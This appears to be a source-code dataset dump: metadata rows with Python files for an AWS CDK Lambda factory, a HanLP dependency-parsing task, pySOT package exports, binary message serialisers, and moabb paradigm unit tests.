For complete list of properties refer to CDK Documentation - Lambda Function: https://docs.aws.amazon.com/cdk/api/v2/python/aws_cdk.aws_lambda/Function.html Returns ------- fn : aws_cdk.aws_lambda.Function Lambda function """ # Load function configuration from ddk.json based on environment id and resource id function_config_dict: Dict[str, Any] = Config().get_resource_config( environment_id=environment_id, id=id, ) declared_fields = FunctionSchema().declared_fields.items() # Load CDK-only fields from schema function_construct_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if not field.metadata] ).load(function_config_dict, partial=["removal_policy"]) # Load config-only fields from schema function_config_only_props: Dict[str, Any] = FunctionSchema( only=[name for name, field in declared_fields if field.metadata == {"config_only": True}] ).load(function_config_dict, partial=["removal_policy"]) # Set up networking function_construct_props["vpc"] = LambdaFactory._get_vpc( scope, id, vpc_id=function_config_only_props.get("vpc_id") ) function_construct_props["vpc_subnets"] = LambdaFactory._get_vpc_subnets( scope, id, vpc_subnet_ids=function_config_only_props.get("vpc_subnet_ids"), vpc_subnet_type=function_config_only_props.get("vpc_subnet_type"), vpc_subnet_group_name=function_config_only_props.get("vpc_subnet_group_name"), ) function_construct_props["security_groups"] = LambdaFactory._get_security_groups( scope, id, security_group_ids=function_config_only_props.get("security_group_ids") ) # Collect all explicit function arguments function_props = { "code": code, "handler": handler, "runtime": runtime, "role": role, "function_name": function_name, "description": description, "dead_letter_queue_enabled": dead_letter_queue_enabled, "dead_letter_queue": dead_letter_queue, "memory_size": memory_size, "timeout": timeout, **function_props, } # Explicit ("hardcoded") props should always take precedence over config for key, value in 
function_props.items(): if value is not None: function_construct_props[key] = value _logger.debug(f"function_construct_props: {function_construct_props}") # Create the function fn: lmb.IFunction = lmb.Function(scope, id, **function_construct_props) # Add IAM permissions if "vpc" in function_construct_props: LambdaFactory.add_vpc_permissions(fn) return fn @staticmethod def _get_vpc(scope: Construct, id: str, vpc_id: Optional[str] = None) -> Optional[ec2.IVpc]: return ec2.Vpc.from_lookup(scope, f"{id}-{vpc_id}-vpc", vpc_id=vpc_id) if vpc_id else None @staticmethod def _get_vpc_subnets( scope: Construct, id: str, vpc_subnet_ids: Optional[List[str]] = None, vpc_subnet_type: Optional[ec2.SubnetType] = None, vpc_subnet_group_name: Optional[str] = None, ) -> Optional[ec2.SubnetSelection]: subnets: Optional[List[ec2.ISubnet]] = ( [ec2.Subnet.from_subnet_id(scope, f"{id}-{subnet_id}-sb", subnet_id) for subnet_id in vpc_subnet_ids] if vpc_subnet_ids else None ) return ( ec2.SubnetSelection( subnet_type=vpc_subnet_type, subnet_group_name=vpc_subnet_group_name, subnets=subnets, ) if vpc_subnet_type or vpc_subnet_group_name or subnets else None ) @staticmethod def _get_security_groups( scope: Construct, id: str, security_group_ids: Optional[List[str]] = None, ) -> Optional[List[ec2.ISecurityGroup]]: return ( [ ec2.SecurityGroup.from_security_group_id(scope, f"{id}-{security_group_id}-sg", security_group_id) for security_group_id in security_group_ids ] if security_group_ids else None ) @staticmethod def add_vpc_permissions(fn: lmb.IFunction) -> None: fn.add_to_role_policy( PolicyStatement( actions=[ "ec2:AssignPrivateIpAddresses", "ec2:CreateNetworkInterface", "ec2:DeleteNetworkInterface", "ec2:DescribeNetworkInterfaces", "ec2:UnassignPrivateIpAddresses", ], resources=["*"], ) )
2,112
0
131
f414007c79614bcaf6561ed9cfe13b9f48716da0
8,240
py
Python
hanlp/components/mtl/tasks/dep.py
antfootAlex/HanLP
e8044b27ae1de54b9070db08549853d3ca8271e2
[ "Apache-2.0" ]
3
2022-03-07T08:33:16.000Z
2022-03-07T08:38:08.000Z
hanlp/components/mtl/tasks/dep.py
hushaoyun/HanLP
967b52404c9d0adbc0cff2699690c127ecfca36e
[ "Apache-2.0" ]
null
null
null
hanlp/components/mtl/tasks/dep.py
hushaoyun/HanLP
967b52404c9d0adbc0cff2699690c127ecfca36e
[ "Apache-2.0" ]
null
null
null
# -*- coding:utf-8 -*- # Author: hankcs # Date: 2020-08-13 21:39 import logging from typing import Dict, Any, Union, Iterable, List import torch from torch.optim import Adam from torch.optim.lr_scheduler import ExponentialLR from torch.utils.data import DataLoader from hanlp.common.dataset import SamplerBuilder, PadSequenceDataLoader from hanlp.common.transform import VocabDict, TransformList from hanlp.components.mtl.tasks import Task from hanlp.components.parsers.biaffine.biaffine_dep import BiaffineDependencyParser from hanlp.components.parsers.biaffine.biaffine_model import BiaffineDecoder from hanlp.datasets.parsing.loaders.conll_dataset import append_bos from hanlp.layers.scalar_mix import ScalarMixWithDropoutBuilder from hanlp.metrics.metric import Metric from hanlp.metrics.mtl import MetricDict from hanlp.utils.time_util import CountdownTimer from hanlp_common.constant import EOS from hanlp_common.util import merge_locals_kwargs
49.047619
119
0.617597
# -*- coding:utf-8 -*- # Author: hankcs # Date: 2020-08-13 21:39 import logging from typing import Dict, Any, Union, Iterable, List import torch from torch.optim import Adam from torch.optim.lr_scheduler import ExponentialLR from torch.utils.data import DataLoader from hanlp.common.dataset import SamplerBuilder, PadSequenceDataLoader from hanlp.common.transform import VocabDict, TransformList from hanlp.components.mtl.tasks import Task from hanlp.components.parsers.biaffine.biaffine_dep import BiaffineDependencyParser from hanlp.components.parsers.biaffine.biaffine_model import BiaffineDecoder from hanlp.datasets.parsing.loaders.conll_dataset import append_bos from hanlp.layers.scalar_mix import ScalarMixWithDropoutBuilder from hanlp.metrics.metric import Metric from hanlp.metrics.mtl import MetricDict from hanlp.utils.time_util import CountdownTimer from hanlp_common.constant import EOS from hanlp_common.util import merge_locals_kwargs class BiaffineDependencyParsing(Task, BiaffineDependencyParser): def __init__(self, trn: str = None, dev: str = None, tst: str = None, sampler_builder: SamplerBuilder = None, dependencies: str = None, scalar_mix: ScalarMixWithDropoutBuilder = None, use_raw_hidden_states=False, lr=2e-3, separate_optimizer=False, cls_is_bos=True, sep_is_eos=False, punct=False, tree=False, proj=False, n_mlp_arc=500, n_mlp_rel=100, mlp_dropout=.33, mu=.9, nu=.9, epsilon=1e-12, decay=.75, decay_steps=5000, use_pos=False, max_seq_len=None, **kwargs) -> None: """Biaffine dependency parsing (:cite:`dozat:17a`). Args: trn: Path to training set. dev: Path to dev set. tst: Path to test set. sampler_builder: A builder which builds a sampler. dependencies: Its dependencies on other tasks. scalar_mix: A builder which builds a `ScalarMixWithDropout` object. use_raw_hidden_states: Whether to use raw hidden states from transformer without any pooling. lr: Learning rate for this task. separate_optimizer: Use customized separate optimizer for this task. 
cls_is_bos: ``True`` to treat the first token as ``BOS``. sep_is_eos: ``True`` to treat the last token as ``EOS``. punct: ``True`` to include punctuations in evaluation. tree: ``True`` to enforce tree constraint. proj: ``True`` for projective parsing. n_mlp_arc: Number of features for arc representation. n_mlp_rel: Number of features for rel representation. mlp_dropout: Dropout applied to MLPs. mu: First coefficient used for computing running averages of gradient and its square in Adam. nu: Second coefficient used for computing running averages of gradient and its square in Adam. epsilon: Term added to the denominator to improve numerical stability decay: Decay rate for exceptional lr scheduler. decay_steps: Decay every ``decay_steps`` steps. use_pos: Use pos feature. max_seq_len: Prune samples longer than this length. **kwargs: Not used. """ super().__init__(**merge_locals_kwargs(locals(), kwargs)) self.vocabs = VocabDict() def update_metrics(self, batch: Dict[str, Any], output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], prediction: Dict[str, Any], metric: Union[MetricDict, Metric]): BiaffineDependencyParser.update_metric(self, *prediction, batch['arc'], batch['rel_id'], output[1], batch.get('punct_mask', None), metric, batch) def decode_output(self, output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], mask: torch.BoolTensor, batch: Dict[str, Any], decoder, **kwargs) -> Union[Dict[str, Any], Any]: (arc_scores, rel_scores), mask = output return BiaffineDependencyParser.decode(self, arc_scores, rel_scores, mask, batch) def compute_loss(self, batch: Dict[str, Any], output: Union[torch.Tensor, Dict[str, torch.Tensor], Iterable[torch.Tensor], Any], criterion) -> \ Union[torch.FloatTensor, Dict[str, torch.FloatTensor]]: (arc_scores, rel_scores), mask = output return BiaffineDependencyParser.compute_loss(self, arc_scores, rel_scores, batch['arc'], batch['rel_id'], mask, criterion, batch) def build_model(self, 
encoder_size, training=True, **kwargs) -> torch.nn.Module: return BiaffineDecoder(encoder_size, self.config.n_mlp_arc, self.config.n_mlp_rel, self.config.mlp_dropout, len(self.vocabs.rel)) def build_metric(self, **kwargs): return BiaffineDependencyParser.build_metric(self, **kwargs) def build_dataloader(self, data, transform: TransformList = None, training=False, device=None, logger: logging.Logger = None, gradient_accumulation=1, **kwargs) -> DataLoader: transform.insert(0, append_bos) dataset = BiaffineDependencyParser.build_dataset(self, data, transform) if isinstance(data, str): dataset.purge_cache() if self.vocabs.mutable: BiaffineDependencyParser.build_vocabs(self, dataset, logger, transformer=True) if dataset.cache: timer = CountdownTimer(len(dataset)) BiaffineDependencyParser.cache_dataset(self, dataset, timer, training, logger) max_seq_len = self.config.get('max_seq_len', None) if max_seq_len and isinstance(data, str): dataset.prune(lambda x: len(x['token_input_ids']) > 510, logger) return PadSequenceDataLoader( batch_sampler=self.sampler_builder.build(self.compute_lens(data, dataset, length_field='FORM'), shuffle=training, gradient_accumulation=gradient_accumulation), device=device, dataset=dataset, pad=self.get_pad_dict()) def feed_batch(self, h: torch.FloatTensor, batch: Dict[str, torch.Tensor], mask: torch.BoolTensor, decoder: torch.nn.Module): logits = super().feed_batch(h, batch, mask, decoder) mask = mask.clone() mask[:, 0] = 0 return logits, mask def build_optimizer(self, decoder: torch.nn.Module, **kwargs): config = self.config optimizer = Adam(decoder.parameters(), config.lr, (config.mu, config.nu), config.epsilon) scheduler = ExponentialLR(optimizer, config.decay ** (1 / config.decay_steps)) return optimizer, scheduler def input_is_flat(self, data) -> bool: return BiaffineDependencyParser.input_is_flat(self, data, self.config.use_pos) def prediction_to_result(self, prediction: Dict[str, Any], batch: Dict[str, Any]) -> List: arcs, rels = 
prediction arcs = arcs[:, 1:] # Skip the ROOT rels = rels[:, 1:] arcs = arcs.tolist() rels = rels.tolist() vocab = self.vocabs['rel'].idx_to_token for arcs_per_sent, rels_per_sent, tokens in zip(arcs, rels, batch['token']): tokens = tokens[1:] sent_len = len(tokens) result = list(zip(arcs_per_sent[:sent_len], [vocab[r] for r in rels_per_sent[:sent_len]])) yield result def build_samples(self, inputs, cls_is_bos=False, sep_is_eos=False): return [{'FORM': token + ([EOS] if sep_is_eos else [])} for token in inputs]
4,262
3,001
23
cf676ab96dacbd16b460fdb6d7e34436bac6a565
419
py
Python
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
180
2015-11-17T03:36:31.000Z
2022-03-16T10:09:42.000Z
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
41
2015-06-30T15:43:10.000Z
2021-02-04T06:03:02.000Z
pySOT/__init__.py
WY-Wang/pySOT
a2de59a0ab00da0465b964e070199fe4773918cd
[ "BSD-3-Clause" ]
45
2015-10-29T16:40:11.000Z
2021-11-14T01:44:39.000Z
#!/usr/bin/env python3 from . import auxiliary_problems, controller, experimental_design, optimization_problems, strategy, surrogate __version__ = "0.3.3" __author__ = "David Eriksson, David Bindel, Christine Shoemaker" __all__ = [ "auxiliary_problems", "controller", "experimental_design", "optimization_problems", "strategy", "surrogate", # Other "__author__", "__version__", ]
22.052632
109
0.704057
#!/usr/bin/env python3 from . import auxiliary_problems, controller, experimental_design, optimization_problems, strategy, surrogate __version__ = "0.3.3" __author__ = "David Eriksson, David Bindel, Christine Shoemaker" __all__ = [ "auxiliary_problems", "controller", "experimental_design", "optimization_problems", "strategy", "surrogate", # Other "__author__", "__version__", ]
0
0
0
6d2cdfac699b5c92a28578e4397e7d6a16af2a88
2,799
py
Python
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
message_body.py
juhyun0/python_network
fe730a6b405d80b910fe18e082b5bf1d85cba0dd
[ "Unlicense" ]
null
null
null
from message import ISerializable import message import struct
23.923077
84
0.540907
from message import ISerializable import message import struct class BodyRequest(ISerializable): def __init__(self, buffer): if buffer != None: slen = len(buffer) self.struct_fmt = str.format('=Q{0}s', slen - 8) self.struct_len = struct.calcsize(self.struct_fmt) if slen > 4: slen = slen - 4 else: slen = 0 unpacked = struct.unpack(self.struct_fmt, buffer) self.FILESIZE = unpacked[0] self.FILENAME = unpacked[1].decode(encoding='utf-8').replace('\x00', '') else: self.struct_fmt = str.format('=Q{0}s', 0) self.struct_len = struct.calcsize(self.struct_fmt) self.FILESIZE = 0 self.FILENAME = '' def GetBytes(self): buffer = self.FILENAME.encode(encoding='utf-8') self.struct_fmt = str.format('=Q{0}s', len(buffer)) return struct.pack( self.struct_fmt, *( self.FILESIZE, buffer )) def GetSize(self): buffer = self.FILENAME.encode(encoding='utf-8') self.struct_fmt = str.format('=Q{0}s', len(buffer)) self.struct_len = struct.calcsize(self.struct_fmt) return self.struct_len class BodyResponse(ISerializable): def __init__(self, buffer): self.struct_fmt = 'IB' self.struct_len = struct.calcsize(self.struct_fmt) if buffer != None: unpacked = struct.unpack(self.struct_fmt, buffer) self.MSGID = unpacked[0] self.RESPONSE = unpacked[1] else: self.MSGID = 0 self.RESPONSE = message.DENIED def GetBytes(self): return struct.pack( self.struct_fmt, *( self.MSGID, self.RESPONSE )) def GetSize(self): return self.struct_len class BodyData(ISerializable): def __init__(self, buffer): if buffer != None: self.DATA = buffer def GetBytes(self): return self.DATA def GetSize(self): return len(self.DATA) class BodyResult(ISerializable): def __init__(self, buffer): self.struct_fmt = '=IB' self.struct_len = struct.calcsize(self.struct_fmt) if buffer: unpacked = struct.unpack(self.struct_fmt, buffer) self.MSGID = unpacked[0] self.RESULT = unpacked[1] else: self.MSGID = 0 self.RESULT = message.FAIL def GetBytes(self): return struct.pack( self.struct_fmt, *( self.MSGID, self.RESULT )) def GetSize(self): return 
self.struct_len
2,272
45
414
0ae4e1aacab37222a89735b99e10a43c842bb161
17,586
py
Python
moabb/tests/paradigms.py
plcrodrigues/moabb
aa4274fe7905631864e854c121c92e1927061f29
[ "BSD-3-Clause" ]
321
2017-06-03T16:14:45.000Z
2022-03-28T17:43:59.000Z
moabb/tests/paradigms.py
plcrodrigues/moabb
aa4274fe7905631864e854c121c92e1927061f29
[ "BSD-3-Clause" ]
223
2017-06-03T17:41:57.000Z
2022-03-29T09:07:44.000Z
moabb/tests/paradigms.py
girafe-ai/moabb
78bbb48a2a0058b0725ebeba1ba1e3203f0eacd5
[ "BSD-3-Clause" ]
118
2017-06-03T18:36:35.000Z
2022-03-16T06:22:02.000Z
import logging import unittest import numpy as np from mne import BaseEpochs from moabb.datasets.fake import FakeDataset from moabb.paradigms import ( P300, SSVEP, BaseMotorImagery, BaseP300, BaseSSVEP, FilterBankLeftRightImagery, FilterBankMotorImagery, FilterBankSSVEP, LeftRightImagery, ) log = logging.getLogger(__name__) log.setLevel(logging.ERROR)
43.315271
89
0.65501
import logging import unittest import numpy as np from mne import BaseEpochs from moabb.datasets.fake import FakeDataset from moabb.paradigms import ( P300, SSVEP, BaseMotorImagery, BaseP300, BaseSSVEP, FilterBankLeftRightImagery, FilterBankMotorImagery, FilterBankSSVEP, LeftRightImagery, ) log = logging.getLogger(__name__) log.setLevel(logging.ERROR) class SimpleMotorImagery(BaseMotorImagery): # Needed to assess BaseImagery def used_events(self, dataset): return dataset.event_id class Test_MotorImagery(unittest.TestCase): def test_BaseImagery_paradigm(self): paradigm = SimpleMotorImagery() dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # we should have all the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D Array self.assertEqual(len(X.shape), 3) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # we should have only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseImagery_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset(paradigm="imagery", channels=["C3", "Cz", "C4"]) datasetB = FakeDataset(paradigm="imagery", channels=["Cz", "C4", "C3"]) paradigm = SimpleMotorImagery(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def 
test_BaseImagery_tmintmax(self): self.assertRaises(ValueError, SimpleMotorImagery, tmin=1, tmax=0) def test_BaseImagery_filters(self): # can work with filter bank paradigm = SimpleMotorImagery(filters=[[7, 12], [12, 24]]) dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_baseImagery_wrongevent(self): # test process_raw return empty list if raw does not contain any # selected event. cetain runs in dataset are event specific. paradigm = SimpleMotorImagery(filters=[[7, 12], [12, 24]]) dataset = FakeDataset(paradigm="imagery") raw = dataset.get_data([1])[1]["session_0"]["run_0"] # add something on the event channel raw._data[-1] *= 10 self.assertIsNone(paradigm.process_raw(raw, dataset)) # zeros it out raw._data[-1] *= 0 self.assertIsNone(paradigm.process_raw(raw, dataset)) def test_BaseImagery_noevent(self): # Assert error if events from paradigm and dataset dont overlap paradigm = SimpleMotorImagery(events=["left_hand", "right_hand"]) dataset = FakeDataset(paradigm="imagery") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_LeftRightImagery_paradigm(self): # with a good dataset paradigm = LeftRightImagery() dataset = FakeDataset(event_list=["left_hand", "right_hand"], paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) self.assertEqual(len(np.unique(labels)), 2) self.assertEqual(list(np.unique(labels)), ["left_hand", "right_hand"]) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_LeftRightImagery_noevent(self): # we cant pass event to this class self.assertRaises(ValueError, LeftRightImagery, events=["a"]) def 
test_LeftRightImagery_badevents(self): paradigm = LeftRightImagery() # does not accept dataset with bad event dataset = FakeDataset(paradigm="imagery") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_FilterBankMotorImagery_paradigm(self): # can work with filter bank paradigm = FilterBankMotorImagery() dataset = FakeDataset(paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 6) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_FilterBankMotorImagery_moreclassesthanevent(self): self.assertRaises( AssertionError, FilterBankMotorImagery, n_classes=3, events=["hands", "feet"] ) def test_FilterBankLeftRightImagery_paradigm(self): # can work with filter bank paradigm = FilterBankLeftRightImagery() dataset = FakeDataset(event_list=["left_hand", "right_hand"], paradigm="imagery") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 6) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) class SimpleP300(BaseP300): # Needed to assess BaseP300 def used_events(self, dataset): return dataset.event_id class Test_P300(unittest.TestCase): def test_BaseP300_paradigm(self): paradigm = SimpleP300() dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # we should have all the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D Array self.assertEqual(len(X.shape), 3) # labels must contain 2 values (Target/NonTarget) self.assertEqual(len(np.unique(labels)), 2) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) 
self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # we should have only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseP300_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset( paradigm="p300", channels=["C3", "Cz", "C4"], event_list=["Target", "NonTarget"], ) datasetB = FakeDataset( paradigm="p300", channels=["Cz", "C4", "C3"], event_list=["Target", "NonTarget"], ) paradigm = SimpleP300(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def test_BaseP300_tmintmax(self): self.assertRaises(ValueError, SimpleP300, tmin=1, tmax=0) def test_BaseP300_filters(self): # can work with filter bank paradigm = SimpleP300(filters=[[1, 12], [12, 24]]) dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D Array self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseP300_wrongevent(self): # test process_raw return empty list if raw does not contain any # selected event. cetain runs in dataset are event specific. 
paradigm = SimpleP300(filters=[[1, 12], [12, 24]]) dataset = FakeDataset(paradigm="p300", event_list=["Target", "NonTarget"]) raw = dataset.get_data([1])[1]["session_0"]["run_0"] # add something on the event channel raw._data[-1] *= 10 self.assertIsNone(paradigm.process_raw(raw, dataset)) # zeros it out raw._data[-1] *= 0 self.assertIsNone(paradigm.process_raw(raw, dataset)) def test_P300_specifyevent(self): # we cant pass event to this class self.assertRaises(ValueError, P300, events=["a"]) def test_P300_wrongevent(self): # does not accept dataset with bad event paradigm = P300() dataset = FakeDataset(paradigm="p300") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_P300_paradigm(self): # with a good dataset paradigm = P300() dataset = FakeDataset(event_list=["Target", "NonTarget"], paradigm="p300") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) self.assertEqual(len(np.unique(labels)), 2) self.assertEqual(list(np.unique(labels)), sorted(["Target", "NonTarget"])) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) class Test_SSVEP(unittest.TestCase): def test_BaseSSVEP_paradigm(self): paradigm = BaseSSVEP(n_classes=None) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # Only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # we should have two sessions in the metadata, n_classes = 2 as default self.assertEqual(len(np.unique(metadata.session)), 2) # should 
return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseSSVEP_channel_order(self): """test if paradigm return correct channel order, see issue #227""" datasetA = FakeDataset(paradigm="ssvep", channels=["C3", "Cz", "C4"]) datasetB = FakeDataset(paradigm="ssvep", channels=["Cz", "C4", "C3"]) paradigm = BaseSSVEP(channels=["C4", "C3", "Cz"]) ep1, _, _ = paradigm.get_data(datasetA, subjects=[1], return_epochs=True) ep2, _, _ = paradigm.get_data(datasetB, subjects=[1], return_epochs=True) self.assertEqual(ep1.info["ch_names"], ep2.info["ch_names"]) def test_baseSSVEP_tmintmax(self): # Verify that tmin < tmax self.assertRaises(ValueError, BaseSSVEP, tmin=1, tmax=0) def test_BaseSSVEP_filters(self): # Accept filters paradigm = BaseSSVEP(filters=[(10.5, 11.5), (12.5, 13.5)]) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array self.assertEqual(len(X.shape), 4) # Last dim should be 2 as the number of filters self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_BaseSSVEP_nclasses_default(self): # Default is with 3 classes paradigm = BaseSSVEP() dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # labels must contain all 3 classes of dataset, # as n_classes is "None" by default (taking all classes) self.assertEqual(len(np.unique(labels)), 3) def test_BaseSSVEP_specified_nclasses(self): # Set the number of classes paradigm = BaseSSVEP(n_classes=3) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # labels must contain 3 values self.assertEqual(len(np.unique(labels)), 3) def test_BaseSSVEP_toomany_nclasses(self): paradigm = BaseSSVEP(n_classes=4) 
dataset = FakeDataset(event_list=["13", "15"], paradigm="ssvep") self.assertRaises(ValueError, paradigm.get_data, dataset) def test_BaseSSVEP_moreclassesthanevent(self): self.assertRaises(AssertionError, BaseSSVEP, n_classes=3, events=["13.", "14."]) def test_SSVEP_noevent(self): # Assert error if events from paradigm and dataset dont overlap paradigm = SSVEP(events=["11", "12"], n_classes=2) dataset = FakeDataset(event_list=["13", "14"], paradigm="ssvep") self.assertRaises(AssertionError, paradigm.get_data, dataset) def test_SSVEP_paradigm(self): paradigm = SSVEP(n_classes=None) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain 4 values, defined in the dataset self.assertEqual(len(np.unique(labels)), 4) # metadata must have subjets, sessions, runs self.assertTrue("subject" in metadata.columns) self.assertTrue("session" in metadata.columns) self.assertTrue("run" in metadata.columns) # Only one subject in the metadata self.assertEqual(np.unique(metadata.subject), 1) # We should have two sessions in the metadata self.assertEqual(len(np.unique(metadata.session)), 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_SSVEP_singlepass(self): # Accept only single pass filter paradigm = SSVEP(fmin=2, fmax=25) dataset = FakeDataset(paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # Verify that they have the same length self.assertEqual(len(X), len(labels), len(metadata)) # X must be a 3D array self.assertEqual(len(X.shape), 3) # labels must contain all 3 classes of dataset, # as n_classes is "None" by default (taking all classes) self.assertEqual(len(np.unique(labels)), 3) # should 
return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_SSVEP_filter(self): # Do not accept multiple filters self.assertRaises(ValueError, SSVEP, filters=[(10.5, 11.5), (12.5, 13.5)]) def test_FilterBankSSVEP_paradigm(self): # FilterBankSSVEP with all events paradigm = FilterBankSSVEP(n_classes=None) dataset = FakeDataset(event_list=["13", "15", "17", "19"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array self.assertEqual(len(X.shape), 4) # X must be a 4D array with d=4 as last dimension for the 4 events self.assertEqual(X.shape[-1], 4) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs) def test_FilterBankSSVEP_filters(self): # can work with filter bank paradigm = FilterBankSSVEP(filters=[(10.5, 11.5), (12.5, 13.5)]) dataset = FakeDataset(event_list=["13", "15", "17"], paradigm="ssvep") X, labels, metadata = paradigm.get_data(dataset, subjects=[1]) # X must be a 4D array with d=2 as last dimension for the 2 filters self.assertEqual(len(X.shape), 4) self.assertEqual(X.shape[-1], 2) # should return epochs epochs, _, _ = paradigm.get_data(dataset, subjects=[1], return_epochs=True) self.assertIsInstance(epochs, BaseEpochs)
14,160
2,860
167
6c54ad6eb0c9dcb90c8b78eed507fc7172e160ae
5,067
py
Python
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
lib_photo_scanner/api.py
Techainer/lib_photo_scanner
58f7efa5e5b9630bc063d614bfbfde904bfa4f00
[ "MIT" ]
null
null
null
